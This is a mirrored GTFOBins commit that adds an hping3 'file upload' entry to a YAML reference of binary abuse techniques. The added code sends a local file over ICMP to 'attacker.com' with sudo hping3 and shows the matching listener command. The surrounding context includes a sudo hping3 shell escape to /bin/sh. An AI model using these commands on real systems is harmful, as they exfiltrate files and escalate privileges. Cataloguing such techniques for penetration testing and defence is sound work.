mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add hping3 file upload
This commit is contained in:
commit
f2fdd7fd1a
@ -12,4 +12,14 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
sudo hping3
|
sudo hping3
|
||||||
/bin/sh
|
/bin/sh
|
||||||
|
- description: |
|
||||||
|
The file is continuously sent, adjust the `--count` parameter or kill the sender when done. Receive on the attacker box with:
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo hping3 --icmp --listen xxx --dump
|
||||||
|
```
|
||||||
|
code: |
|
||||||
|
RHOST=attacker.com
|
||||||
|
LFILE=file_to_read
|
||||||
|
sudo hping3 "$RHOST" --icmp --data 500 --sign xxx --file "$LFILE"
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user